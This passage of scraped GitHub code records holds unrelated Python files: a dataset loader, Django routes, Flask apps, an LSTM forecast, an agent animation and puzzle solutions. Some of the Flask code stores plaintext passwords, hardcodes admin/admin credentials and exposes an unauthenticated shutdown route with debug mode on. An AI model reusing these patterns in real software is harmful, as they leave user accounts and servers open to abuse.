Turnbull, L. Barrington, D. Torres, and G. Lanckriet, `Semantic\n Annotation and Retrieval of Music and Sound Effects.\n `_\n IEEE Transactions on Audio, Speech, and Language Processing, vol. 16,\n no. 2, pp. 467-476, Feb. 
2008.\n \"\"\"\n data_dir = get_data_dir(data_home, CAL500_DIR)\n tar_path = get_data(URL, data_dir, CAL500_TAR, download_if_missing)\n file_path = get_quantized_data_path(data_dir, codebook_size)\n\n with tarfile.open(tar_path) as tar:\n\n vocab = pd.read_csv(tar.extractfile('vocab.txt'), header=None)\n Y = pd.read_csv(tar.extractfile('hardAnnotations.txt'),\n header=None, names=vocab.values.ravel())\n try:\n X = pd.read_pickle(file_path)\n except IOError:\n delta = [member for member in tar\n if member.name.startswith('delta/')]\n songs = [pd.read_csv(tar.extractfile(song),\n header=None, delim_whitespace=True)\n for song in delta]\n mfccs = pd.concat(songs, keys=range(len(songs)))\n X = quantize_mfccs(mfccs, n_clusters=codebook_size)\n X.to_pickle(file_path)\n\n return X, Y\n","repo_name":"dschwertfeger/cbar","sub_path":"cbar/datasets/cal500.py","file_name":"cal500.py","file_ext":"py","file_size_in_byte":4973,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"81"} +{"seq_id":"72399233226","text":"obj_test = {\n 'Obj1':'1.21cm',\n 'Ob2':'2.21cm',\n 'Obj3':'1.21cm',\n 'Obj4':'0.98cm',\n 'Obj5':'1.01cm',\n}\n\nother_obj = {\n k: float(v.strip('cm'))\n for k, v in obj_test.items()\n}\n\nmax_value = max(other_obj.values())\n\nwho = [k for k, v in other_obj.items() if v == max_value]","repo_name":"nmuna520/python_snippets","sub_path":"greater.py","file_name":"greater.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"ceb","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"3386749754","text":"from django.urls import path, include\nfrom .views import *\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\n\nurlpatterns = [\n path('api/translate/', translateView),\n path('api/submitcard/', SubmitCard),\n path('api/savecard/', SaveCard),\n path('api/likecard/', LikeCard),\n path('api/readcard/', ReadCard),\n path('api/scoretrans/', ScoreTrans),\n path('api/addtrans/', AddTrans),\n path('api/cheated/', CheatedCardView),\n path('api/succeeded/', SucceededCardView),\n path('api/deletecard/', DeleteCardView),\n path('api/contactform/', SendContactMessage),\n path('api/download//', downloadView),\n path('api/setLang/', SetGuest),\n path('', HomeView),\n path('MyCards/', MyCardsView0),\n path('RecentlyRead/', RecentlyReadView0),\n path('SavedCards/', SavedCardsView0),\n path('cards//', SingleCardView0),\n path('create/', CreateCard0),\n path('Privacy/', PrivacyView),\n path('Cookies/', CookiesView),\n path('ToC/', ToCView),\n path('About/', AboutView),\n path('ContactUs/', ContactUsView),\n path('', include(\"django.contrib.auth.urls\"),),\n path('Register/', RegisterView0),\n path('sitemap.xml/', SitemapView),\n path('AllCards/',AllCards)\n] + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\n","repo_name":"BlankuApp/BlankuApp","sub_path":"backend/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"71831086026","text":"from flask import Flask,request,jsonify,make_response,render_template,session,redirect\nfrom secrets import token_hex\n\nimport datetime\nimport function\napp = Flask(__name__)\napp.secret_key = token_hex(24)\n\n\n@app.route('/')\ndef hello():\n \"\"\"Return a friendly HTTP greeting.\"\"\"\n return \"basic server load success\"\n\n@app.route('/demo')\ndef demo():\n clientID = request.cookies.get('username')\n if clientID is 
None:\n resp = make_response(render_template('index.html'))\n resp.set_cookie('username', token_hex(16), expires=datetime.datetime.now() + datetime.timedelta(days=30))\n else:\n resp = make_response(render_template('index.html'))\n session['clientID'] = clientID\n session.permanent = False\n return resp\n\n@app.route('/demo_result')\ndef demo_result():\n sessionID = token_hex(12)\n math = request.args.get('math', default='*', type=float)\n science = request.args.get('science', default='*', type=float)\n english = request.args.get('english', default='*', type=float)\n MT = request.args.get('MT', default='*', type=float)\n pc = request.args.get('pc', default='*', type=str)\n email = request.args.get('email', default='*', type=str)\n school = request.args.get('school', default='*', type=str)\n grade = request.args.get('grade', default='*', type=str)\n gender = request.args.get('gender', default='*', type=str)\n term = request.args.get('term', default='*', type=str)\n DB_status = function.get_status()\n clientID = session.get('clientID', None)\n user_status = function.input_user(pc,email,school,grade,sessionID,clientID,gender)\n user_score=function.input_score(math,science,english,grade,sessionID,MT,term)\n Tscore=function.cal_T(sessionID)\n session['user_status'] = user_status\n session['user_score'] = user_score\n session['DB_status'] = DB_status\n session['T_Score'] = Tscore\n\n return redirect(\"/demo_display\", code=302)\n\n@app.route('/demo_display')\ndef demo_display():\n string =\"\"\"\n Run with below result:
\n 1) DB Status: \"\"\" + str(session['DB_status'])+ \"\"\"
\n 2) Create User Status: \"\"\"+ session['user_status']+ \"\"\"
\n 3) Upload Score Status: \"\"\"+ session['user_score']+ \"\"\"
\n 4) T Score Status: \"\"\"+ session['T_Score']+ \"\"\"


\n \n Demo Complete!\n \n\"\"\"\n return string\n\n@app.errorhandler(404)\ndef not_found(error):\n return make_response(jsonify({'STATUS': 'Not found'}), 404)\n\ndef shutdown_server():\n func = request.environ.get('werkzeug.server.shutdown')\n if func is None:\n raise RuntimeError('Not running with the Werkzeug Server')\n func()\n\n@app.route('/shutdown', methods=['GET'])\ndef shutdown():\n shutdown_server()\n return 'Server shutting down...'\n\n\nif __name__ == '__main__':\n # This is used when running locally only. When deploying to Google App\n # Engine, a webserver process such as Gunicorn will serve the app. This\n # can be configured by adding an `entrypoint` to app.yaml.\n app.run(host='127.0.0.1', port=8080, debug=True)\n# [END gae_python37_app]\n","repo_name":"GZR5876/PSLE_FE","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3056,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"37284055844","text":"from flask import Flask, render_template, request, redirect, url_for, send_from_directory, flash\r\nimport os\r\nimport sys\r\nfrom pymongo import MongoClient\r\nfrom analyser import review_analyser \r\nfrom datetime import datetime\r\nimport numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\nimport keras as kr\r\nimport sklearn\r\nimport math\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense, Activation, LSTM\r\nfrom sklearn.preprocessing import MinMaxScaler\r\nfrom sklearn.metrics import mean_squared_error\r\n\r\nimport itertools\r\nimport warnings\r\nwarnings.filterwarnings('ignore')\r\n\r\ndata = pd.read_csv('data1.csv')\r\n\r\ndata.set_index('Date', inplace = True)\r\ndata1 = data.transpose()\r\ndates = pd.date_range(start = '2019-03-15', freq = 'D', periods = len(data1.columns)*1)\r\ndata_np = data1.transpose().as_matrix()\r\nshape = data_np.shape\r\ndata_np = data_np.reshape((shape[0] * shape[1], 1))\r\ndf = pd.DataFrame({'Mean' : data_np[:,0]})\r\ndf.set_index(dates, inplace = True)\r\n\r\nplt.figure(figsize = (15,5))\r\nplt.plot(df.index, df['Mean'])\r\nplt.title('daily Mean')\r\nplt.xlabel('Date')\r\nplt.ylabel('Mean across Day')\r\nplt.savefig('static/graph.png')\r\n\r\ndataset = df.values\r\ntrain = dataset[0:15,:]\r\ntest = dataset[15:,:]\r\nprint(\"Original data shape:\",dataset.shape)\r\nprint(\"Train shape:\",train.shape)\r\nprint(\"Test shape:\",test.shape)\r\n\r\n# Converting the data into MinMax Scaler because to avoid any outliers present in our dataset\r\nscaler = MinMaxScaler(feature_range = (0,1))\r\nscaled_data = scaler.fit_transform(dataset)\r\nscaled_data.shape\r\n\r\n\r\nx_train, y_train = [], []\r\nfor i in range(5,len(train)):\r\n x_train.append(scaled_data[i-5:i,0])\r\n y_train.append(scaled_data[i,0])\r\nx_train, y_train = np.array(x_train), np.array(y_train)\r\n\r\nx_train = np.reshape(x_train, (x_train.shape[0],x_train.shape[1],1))\r\n\r\n # Creating and fitting the model\r\n\r\nmodel = Sequential()\r\nmodel.add(LSTM(units = 6, return_sequences = True, input_shape = (x_train.shape[1],1)))\r\nmodel.add(LSTM(units = 6))\r\nmodel.add(Dense(1))\r\n\r\nmodel.compile(loss = 'mean_squared_error', optimizer = 'adam')\r\nmodel.fit(x_train, y_train, epochs=10, batch_size = 1, verbose = 2)\r\n# Now Let's perform same operations that are done on train set\r\ninputs = df[len(df) - len(test) - 5:].values\r\ninputs = inputs.reshape(-1,1)\r\ninputs = scaler.transform(inputs)\r\n\r\nX_test = []\r\nfor i in 
range(5,inputs.shape[0]):\r\n X_test.append(inputs[i-5:i,0])\r\nX_test = np.array(X_test)\r\n\r\nX_test = np.reshape(X_test, (X_test.shape[0],X_test.shape[1],1))\r\nMean = model.predict(X_test)\r\nMean1 = scaler.inverse_transform(Mean)\r\n#plotting the train, test and forecast data\r\ntrain = df[:15]\r\ntest = df[15:]\r\ntest['Predictions'] = Mean1\r\ntrainpred = model.predict(X_test,steps=2)\r\n#x_train shape\r\nx_train.shape\r\npred = scaler.inverse_transform(trainpred)\r\npred[0:24] \r\ntestScore = math.sqrt(mean_squared_error(test['Mean'], trainpred[:6,0]))*100\r\nprint('Accuracy Score: %.2f' % (testScore))\r\n\r\ndates1 = pd.date_range(start = '2019-03-30', freq = 'D', end = '2019-04-10')\r\n\r\nnew_df = pd.DataFrame({'Predicted_values':pred[:,0]})\r\n\r\nnew_df.set_index(dates1, inplace = True)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\ncurrentDT = datetime.now()\r\n\r\n\r\ntime = currentDT.strftime(\"%I:%M:%S %p\")\r\n\r\napp = Flask(__name__)\r\ndate=currentDT.strftime(\"%Y-%m-%d\")\r\n#date=datetime.now().today()\r\n#time=datetime.now().time()\r\nconnection = MongoClient(\"localhost\", 27017)\r\ndb = connection.mydatabase \r\nmla=db.mla\r\nmp=db.mp\r\nuser=db.user\r\nmeetings=db.meetings\r\ncomments1=db.usercomments\r\napp.secret_key = 'super'\r\n@app.route('/')\r\ndef index():\r\n return render_template('login_form.html')\r\n\r\n@app.route('/login', methods=['GET','POST'])\r\ndef login():\r\n\tif request.method == 'POST':\r\n\t\tun = str(request.form['UserName'])\r\n\t\tp = str(request.form['Password'])\r\n\t\tradio=str(request.form['contact'])\r\n\t\tif radio == \"admin\":\r\n\t\t\tif un==\"admin\" and p==\"admin\":\r\n\t\t\t\tadu=[]\r\n\t\t\t\tadml=[]\r\n\t\t\t\tadmp=[]\r\n\t\t\t\tfor i in user.find():\r\n\t\t\t\t\tadu.append(i)\r\n\t\t\t\tfor j in mla.find():\r\n\t\t\t\t\tif j['designation'] == 'mla':\r\n\t\t\t\t\t\tadml.append(j)\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tadmp.append(j)\r\n\t\t\t\tli=[]\r\n\t\t\t\t\r\n\t\t\t\t#paste here val\r\n\t\t\t\tif comments1.count() == 0 :\r\n\t\t\t\t\tstars = 0\r\n\t\t\t\telse :\r\n\t\t\t\t\tavg=0\r\n\t\t\t\t\tb=0\r\n\t\t\t\t\tfor rev in comments1.find():\r\n\t\t\t\t\t\tavg = avg + rev['rating']\r\n\t\t\t\t\t\tb = b + 1\r\n\t\t\t\t\tstars = avg / b\r\n\t\t\t\tval = stars\r\n\t\t\t\tcomments = \tcomments1.find()\t\r\n\t\t\t\tflash(comments)\t\r\n\t\t\t\treturn render_template(\"home.html\", user1=adu, mla=adml, mp=admp, val = val, ss=new_df.to_html())\r\n\t\t\telse:\r\n\t\t\t\treturn render_template('login_form.html', data=\"authentication failed\")\r\n\t\telif radio == \"mla\":\r\n\t\t\tfor i in mla.find():\r\n\t\t\t\tif i['designation'] == 'mla':\r\n\t\t\t\t\tif un==i[\"username\"] and p==i[\"password\"]:\r\n\t\t\t\t\t\tml=[]\r\n\t\t\t\t\t\tfor i in user.find():\r\n\t\t\t\t\t\t\tml.append(i)\r\n\t\t\t\t\t\treturn render_template(\"mla.html\", ml=ml)\r\n\t\t\t\t\t\r\n\t\t\treturn render_template('login_form.html', data=\"authentication failed to mla\")\r\n\t\telif radio == \"mp\":\r\n\t\t\tfor i in mla.find():\r\n\t\t\t\tif i['designation'] == 'mp':\r\n\t\t\t\t\tif un==i[\"username\"] and p==i[\"password\"]:\r\n\t\t\t\t\t\tml=[]\r\n\t\t\t\t\t\tfor i in user.find():\r\n\t\t\t\t\t\t\tml.append(i)\r\n\t\t\t\t\t\treturn render_template(\"mp.html\")\r\n\t\t\t\t\r\n\t\t\treturn render_template('login_form.html', data=\"authentication failed to mp\")\r\n\t\telif radio == \"user\":\r\n\t\t\tfor i in user.find():\r\n\t\t\t\tmet=[]\r\n\t\t\t\tif un==i[\"UserName\"] and p==i[\"Password\"]:\r\n\t\t\t\t\tfor i in 
meetings.find():\r\n\t\t\t\t\t\tmet.append(i)\r\n\t\t\t\t\treturn render_template(\"user.html\", ll=met)\r\n\t\t\t\t\r\n\t\t\treturn render_template('login_form.html', data=\"authentication failed\")\r\n\t\telse:\r\n\t\t\treturn render_template('login_form.html', data=\"select raido button\")\r\n\telse:\r\n\t\treturn render_template(\"login_form.html\")\r\n@app.route('/mlampreg', methods=['GET','POST'])\r\ndef mlampreg():\r\n\tif request.method == 'POST':\r\n\t\tradio=str(request.form['contact1'])\r\n\t\tfirstName=str(request.form['First_Name'])\r\n\t\tlastName=str(request.form['Last_Name'])\r\n\t\tdob=str(request.form.get('Birthday_day'))+\"/\"+str(request.form.get('Birthday_Month'))+\"/\"+str(request.form.get('Birthday_Year'))\r\n\t\temail=str(request.form['Email_Id'])\r\n\t\tphno=str(request.form['Mobile_Number'])\r\n\t\tGender=str(request.form['Gender'])\r\n\t\tusername=str(request.form['username'])\r\n\t\tpassword=str(request.form['password'])\r\n\t\taddress=str(request.form['Address'])\r\n\t\tconsistency=str(request.form['consistency'])\r\n\t\tcity=str(request.form['City'])\r\n\t\tpincode=str(request.form['Pin_Code'])\r\n\t\tstate=str(request.form['State'])\r\n\t\tcountry=str(request.form['Country'])\r\n\t\tmladata={\"designation\":radio, \"firstName\":firstName,\"lastName\":lastName,\"dob\":dob,\"email\":email,\"phno\":phno,\"Gender\":Gender,\"username\":username,\"password\":password,\"address\":address,\"consistency\":consistency,\"city\":city,\"pincode\":pincode,\"state\":state,\"country\":country}\r\n\t\tmla.insert_one(mladata)\r\n\t\treturn render_template('mlampreg.html', da=\"sucess\")\r\n\telse:\r\n\t\treturn render_template('mlampreg.html')\r\n\r\n@app.route('/register', methods=['GET','POST'])\r\ndef register():\r\n\tif request.method == 'POST':\r\n\t\tun = request.form['UserName']\r\n\t\tfn = request.form['FirstName']\r\n\t\tln = request.form['LastName']\r\n\t\td = request.form['Date']\r\n\t\tg = request.form['Gmail']\r\n\t\tp = request.form['Password']\r\n\t\tcp = request.form['ConfirmPassword']\r\n\t\tm = request.form['MobileNumber']\r\n\t\tr = request.form['gridRadios']\r\n\t\ta = request.form['Address']\r\n\t\tcs = request.form['Consistency']\r\n\t\tc = request.form['City']\r\n\t\tpc = request.form['Pincode']\r\n\t\tst = request.form['State']\r\n\t\tct = request.form['Country']\r\n\t\t\r\n\t\tuserdata = {'date':date, 'time':time ,'UserName': un, 'FirstName': fn, 'LastName':ln, 'Date':d, 'Gmail':g, 'Password': cp, 'Gender': r, 'Address':a, 'Consistency':cs, 'City':c, 'Pincode':pc, \r\n\t\t'State':st, 'Country':ct}\r\n\t\tuser.insert_one(userdata)\r\n\t\treturn redirect('login')\r\n\treturn render_template('Registration_form.html')\r\n\r\n@app.route('/meetingdetails', methods=['GET','POST'])\r\ndef meetingdetails():\r\n\tif request.method == 'POST':\r\n\t\tplace=request.form['place']\r\n\t\tdate=request.form['date']\r\n\t\ttime=request.form['time']\r\n\t\tpurpose=request.form['purpose']\r\n\t\tmeetingdetails1={'place':place, 'date':date, 'time':time, 'purpose':purpose}\r\n\t\tmeetings.insert_one(meetingdetails1)\r\n\t\treturn render_template('meetingdetails.html', data='sucess')\r\n\telse:\r\n\t\treturn render_template('meetingdetails.html')\r\n\t\r\n\r\n@app.route('/meets', methods=['GET','POST'])\r\ndef meets():\r\n\tls=[]\r\n\tfor i in meetings.find():\r\n\t\tls.append(i)\r\n\tif request.method == 
'POST':\r\n\t\tcomment=request.form['comment']\r\n\t\ta,b,c=review_analyser(comment)\r\n\t\t\r\n\t\tcomments1.insert_one({\"comment\":comment,\"rating\":a,\"star\":b,\"category\":c})\r\n\r\n\t\treturn render_template('meatings.html', meetings1=ls)\r\n\telse:\r\n\t\treturn render_template('meatings.html', meetings1=ls)\r\n\r\n\r\n@app.route('/logout', methods=['GET','POST'])\r\ndef logout():\r\n\treturn render_template('login_form.html')\r\n\r\nif __name__ == '__main__':\r\n app.run(debug = True)","repo_name":"Cloudindojo/Machine_learning","sub_path":"party/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":8852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"38287170384","text":"import sys\nfrom collections import deque\n\nN, M = map(int, sys.stdin.readline().split())\n\nGRID = [list(sys.stdin.readline().strip()) for _ in range(M)]\n\ndx = [1, 0, -1, 0]\ndy = [0, -1, 0, 1]\n\n\ndef bfs(y, x, C):\n to_visit = deque([(y, x)])\n GRID[y][x] = \"K\"\n\n cnt = 0\n\n while to_visit:\n Y, X = to_visit.popleft()\n cnt += 1\n for d in range(4):\n next_Y, next_X = Y + dy[d], X + dx[d]\n if 0 <= next_Y < M and 0 <= next_X < N:\n if not GRID[next_Y][next_X] == \"K\" and GRID[next_Y][next_X] == C:\n GRID[next_Y][next_X] = True\n to_visit.append((next_Y, next_X))\n return cnt**2\n\n\nW = 0\nfor y in range(M):\n for x in range(N):\n if GRID[y][x] == \"W\":\n W += bfs(y, x, \"W\")\n\nB = 0\nfor y in range(M):\n for x in range(N):\n if GRID[y][x] == \"B\":\n B += bfs(y, x, \"B\")\n\nprint(W, B)\n","repo_name":"shiueo/PS","sub_path":"1303.py","file_name":"1303.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"6956444484","text":"# Face Detection is performed using classifiers. \n# A classifier is an algorithm that decides whether a given image is positive or negative if a face is present or not. \n# It needs to be trained on 1.000 and 10.000 of images with and without faces. OpenCV comes with pre trained classifiers.\n# Haar Cascade (basic) - https://github.com/opencv/opencv/tree/master/data/haarcascades\n\nimport cv2 as cv\n\nimg = cv.imread('./Faces/faces_0.jpeg')\n\ndesired_height = 700\naspect_ratio = desired_height/img.shape[0]\ndesired_width = int(img.shape[1]*aspect_ratio)\ndim = (desired_width, desired_height)\nimg = cv.resize(img, dsize=dim, interpolation=cv.INTER_AREA)\ncv.imshow('Faces', img)\n\n# Face detection does not involve skin tone or colors present in the image. Haar cascades look at an object in an image and using the edges tries to determine whether it's a face or not. 
\n\ngray = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\ncv.imshow('Gray Image', gray)\n\nhaar_cascade = cv.CascadeClassifier('haar_face.xml')\n\nfaces_rect = haar_cascade.detectMultiScale(gray, scaleFactor=1.1, minNeighbors=3)\n\nprint(f'Number of faces found = {len(faces_rect)}')\n\nfor (x,y,w,h) in faces_rect:\n cv.rectangle(img, (x,y), (x+w, y+h), (0,255,0), thickness=2)\n\ncv.imshow('Detected Faces', img)\n\n\ncv.waitKey(0)","repo_name":"Mikheltodd/Intro_to_OpenCV","sub_path":"face_recognition/1_face_detection.py","file_name":"1_face_detection.py","file_ext":"py","file_size_in_byte":1271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"5586322405","text":"from django.db.models import Manager as GeoManager\nfrom django.contrib.gis.db import models\nfrom django.utils import timezone\n\n\nclass Region(models.Model):\n name = models.TextField('Region name')\n geom = models.MultiPolygonField(blank=True, null=True)\n x_min = models.FloatField(blank=True, null=True)\n x_max = models.FloatField(blank=True, null=True)\n y_min = models.FloatField(blank=True, null=True)\n y_max = models.FloatField(blank=True, null=True)\n slug = models.TextField('Region slug',blank=True, null=True)\n\n objects = GeoManager()\n\n def __str__(self):\n return self.name\n\n class Meta:\n managed = True\n ordering = ['name']\n verbose_name = \"region\"\n verbose_name_plural = \"regions\"\n\n\nclass LoadEvent(models.Model):\n event_start = models.DateTimeField(default=timezone.now)\n event_finish = models.DateTimeField(null=True, blank=True)\n origin = models.TextField('Source of the original observation', null=True, blank=True)\n data_chunks = models.TextField('List of succesully created local pages', null=True, blank=True)\n n_records_origin = models.IntegerField('Number of records to download', null=True, blank=True)\n n_records_pulled = models.IntegerField('Number of records to download', null=True, blank=True)\n url_used = models.TextField('List of succesully created local pages', null=True, blank=True)\n\n class Meta:\n verbose_name = \"loadevent\"\n verbose_name_plural = \"loadevents\"\n\n\nclass Observation(models.Model):\n species_guess = models.TextField('Guessed species',null=True, blank=True)\n species_id = models.TextField('Species identified',null=True, blank=True)\n original_url = models.URLField('Original url of the observation, if available',null=True,blank=True)\n picture_url = models.URLField('Observation picture',null=True,blank=True)\n observation_time_string = models.CharField('Observation date in string format', max_length=500, null=True, blank=True)\n observation_time = models.DateTimeField('Observation datetime',null=True,blank=True)\n observation_date = models.DateField('Observation date year month day', null=True, blank=True)\n observation_updated_at = models.DateTimeField('Observation last update', null=True, blank=True)\n record_creation_time = models.DateTimeField(auto_now_add=True)\n origin = models.TextField('Source of the original observation',null=True, blank=True)\n location = models.PointField(blank=True, null=True, srid=4326)\n native_id = models.TextField('Id of the observation in its native app',null=True, blank=True)\n load_event = models.ForeignKey(LoadEvent, on_delete=models.CASCADE, null=True)\n region = models.ForeignKey(Region, blank=True, null=True, on_delete=models.CASCADE, )\n iconic_taxon_id = models.IntegerField(blank=True, null=True)\n iconic_taxon_name = models.TextField(blank=True, null=True)\n author = 
models.TextField(blank=True, null=True)\n objects = GeoManager()\n\n def __str__(self):\n return self.species_id\n\n class Meta:\n verbose_name = \"observation\"\n verbose_name_plural = \"observations\"\n ordering = ('species_id',)\n\n\nclass DataProject(models.Model):\n name = models.TextField('Project name')\n slug = models.TextField('Shortened project name', blank=True, null=True)\n url = models.URLField('Project url if available', blank=True, null=True)\n\n\nclass Stats(models.Model):\n region = models.ForeignKey(Region, blank=True, null=True, on_delete=models.CASCADE, )\n project = models.ForeignKey(DataProject, on_delete=models.CASCADE, )\n n_observations = models.IntegerField(default=0)\n last_updated = models.DateTimeField(auto_now=True)\n","repo_name":"aescobarr/data_aggregator_api","sub_path":"main/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"70863960584","text":"import pandas as pandas;\nimport json\nfrom collections import defaultdict\nfrom Common import lemmatize_text\n\n\nindex_filename = 'search_indexs.json';\ncsv_filename = 'data.csv'\n\n#should be called after new data is arrived\ndef get_df():\n return pandas.read_csv(csv_filename);\n\ndef get_data_size():\n df = pandas.read_csv(csv_filename);\n return df.size;\n\n\ndef add_index_col(df):\n if 'id' not in df.columns:\n df.insert(0, 'id', df.reset_index().index)\n df.to_csv(csv_filename, index=False);\n return df;\n\ndef process_word(df):\n \n df['title'] = df['title'].apply(lambda x: lemmatize_text(x));\n df['all_authors'] = df['all_authors'].apply(lambda x: lemmatize_text(x));\n \n return df;\n\ndef create_indexes(df):\n word_dict = defaultdict(list);\n for index, row in df.iterrows():\n title = row['title'];\n authors = row['all_authors'];\n words = title.split() + authors.split();\n for word in words:\n word_dict[word].append(index)\n return word_dict;\n\n\n#utilized everything on this file\ndef create_save_indexes():\n try: \n df = add_index_col(get_df());\n print(\"Processing words.\");\n df = process_word(df);\n \n print(\"Creating Indexes.\");\n indexes = create_indexes(df);\n\n print(\"Indexing finished successfully.\");\n #save indexes\n with open(index_filename, 'w') as new_f:\n json.dump(indexes, new_f, sort_keys=True, indent=4)\n \n return True;\n except Exception as e:\n print(f\"An error occurred on indexing: {str(e)}\")\n return False;\n\n\n#called from subproess\ncreate_save_indexes();\n\n#single_value = df.loc[0:1].copy();\n","repo_name":"Suraj6E/IRA-search-engine","sub_path":"InvertedIndex.py","file_name":"InvertedIndex.py","file_ext":"py","file_size_in_byte":1690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"6061661714","text":"import random\nimport operator\nimport matplotlib.pyplot\nimport agentframework\nimport csv\nimport numpy\nimport matplotlib.animation # import animation from matplotlib package.\n\nnum_of_agents = 10 # Make a num_of_agents variable and assign it to 10\nnum_of_iterations = 100 # Make a num_of_iterations variable and assign it to 100\nneighbourhood = 20 # Make a neighbourhood variable and assign it to 20\nagents = [] # Creat agents list.\nenvironment = [] # Creat environment list.\n\n# Make animation properties.\nfig = matplotlib.pyplot.figure(figsize=(6, 6)) # Set up the figure and the plot size.\nax = fig.add_axes([0, 0, 1, 1]) # Add axis list in the figure.\n\n#frames, = 
ax.plot(x, y)\n\n# To load in.txt file.\nwith open(\"in.txt\") as f:\n data = f.read().splitlines() \n# The downloaded text format is not standard, so needs to change.\n for row in data:\n rowlist = []\n for value in row.split(','):\n if value[-1] == '\\\\':\n value1 = value[0:(len(value)-1)]\n rowlist.append(int(value1))\n else:\n rowlist.append(int(value))\n environment.append(rowlist)\n\nfor line in agents:\n f.write(line)\n#f.close()\n\n\n# # Make the agents by putting into a for-loop.\nfor i in range(num_of_agents):\n agents.append(agentframework.Agent(environment, agents, neighbourhood))\n matplotlib.pyplot.scatter(agents[i].x,agents[i].y) # Make scatter plot.\n \n#matplotlib.pyplot.show()\n\n# Start condition.\ncarry_on = True \n\n# Update data points.\ndef update(frame_number): # Sets the number of animation frames\n fig.clear() # Clear a figure.\n global carry_on # carry_on is a global variable\n \n # Move the agents by putting into nest for-loops.\n for j in range(num_of_iterations):\n for i in range(num_of_agents):\n agents[i].move(\"frame_number\")\n agents[i].eat()\n agents[i].share_with_neighbours()\n \n \"\"\"\n # Set stopping condition.\n if random.random() < 0.1:\n carry_on = False\n print(\"stopping condition\")\n \"\"\"\n \n # Set properties and show the animation plot.\n matplotlib.pyplot.xlim(0, 100) # Set the x-axis range from 0 to 100.\n matplotlib.pyplot.ylim(0, 100) # Set the y-axis range from 0 to 100.\n matplotlib.pyplot.imshow(environment) # Display an image on the axes.\n matplotlib.pyplot.title(label = \"Scatter Plot Animation\") # Set plot title.\n \n # Displays the random points obtained with the for-loop.\n for i in range(num_of_agents):\n matplotlib.pyplot.scatter(agents[i].x,agents[i].y)\n matplotlib.pyplot.show() \n \n# Define a generator function.\ndef gen_function(b = [0]):\n a = 0\n global carry_on # Display clearly, even if it is not assigned.\n while (a < num_of_agents) & (carry_on) : # While-loop.\n yield a\t\t\t# Returns control and waits next call.\n a = a + 1\n\n# Use for-each loop iterator to put out agents. \nfor self in agents:\n for agent in agents:\n agentframework.Agent.distance_between(self, agent) # Calling the method from agentframework.py.\n\n# Make the animation stopping condition.\nanimation = matplotlib.animation.FuncAnimation(fig, update,frames=gen_function, repeat=False)\n\n# Show the plot animation. \nmatplotlib.pyplot.show()\n\n# Save .gif file.\nanimation = matplotlib.animation.save('test_animation.gif',writer='imagemagick')\n\n\n\n\n","repo_name":"hahatori/Animation","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"30843897177","text":"#This is the game controller that orchestrates the gae\n\nfrom tic_tac_toe import Game, Player, Score\n\nplayer1 = None\nplayer2 = None\ngame = None\nplayer_marker=None\nplayer_name=None\nscore = None\n#this function runs after one game is done. 
\ndef game_prompt():\n while(True):\n print('Do you want to play a new game?(yes or no)')\n y_or_n=input()\n if y_or_n.lower().startswith('y'):\n print('new game starting')\n print()\n break\n else:\n print(\"ok, game ending\")\n exit()\n \n\n#While true loop, pools the game until they say stop\nwhile True:\n #get players\n if player1 == None or player2 == None:\n print(\"Welcome to Pragyan's Tic Tok Toe!!!\")\n print()\n print(\"what is the first person's name?\")\n person1= input()\n print(\"what is the second person's name?\")\n person2= input()\n player1 = Player(person1,\"X\")\n player2 = Player(person2,\"O\")\n score = Score(player1, player2)\n\n if game == None:\n game = Game()\n \n if len(game.board_index) > 0: \n if(len(game.board_index)%2==0):\n player_marker=player2.marker\n player_name=player2.name\n else:\n player_marker=player1.marker\n player_name=player1.name\n\n game.printboard()\n print(player_name+', where would you like to put '+player_marker+'? For example, 0,0')\n placement = input()\n game.update_board(placement, player_marker)\n print()\n \n if len(game.board_index) < 5:\n winning_marker = game.check()\n if winning_marker != None:\n winner_name = \"\"\n if winning_marker == player1.marker:\n winner_name = player1.name \n else:\n winner_name = player2.name\n print (\"The winner is: {}\".format(winner_name))\n score.update_score(winner_name)\n score.print_score()\n \n game= Game()\n game_prompt()\n continue\n \n if len(game.board_index) == 0:\n print('It is a Draw!')\n game = Game()\n game_prompt()\n\n","repo_name":"PragyanR/byu-tic-tac-toe","sub_path":"game_controller.py","file_name":"game_controller.py","file_ext":"py","file_size_in_byte":1952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"41695427194","text":"#!/usr/bin/python3\n\"\"\"\nYou are standing at position 0 on an infinite number line. There is a goal at\nposition target.\n\nOn each move, you can either go left or right. During the n-th move (starting\nfrom 1), you take n steps.\n\nReturn the minimum number of steps required to reach the destination.\n\nExample 1:\nInput: target = 3\nOutput: 2\nExplanation:\nOn the first move we step from 0 to 1.\nOn the second step we step from 1 to 3.\nExample 2:\nInput: target = 2\nOutput: 3\nExplanation:\nOn the first move 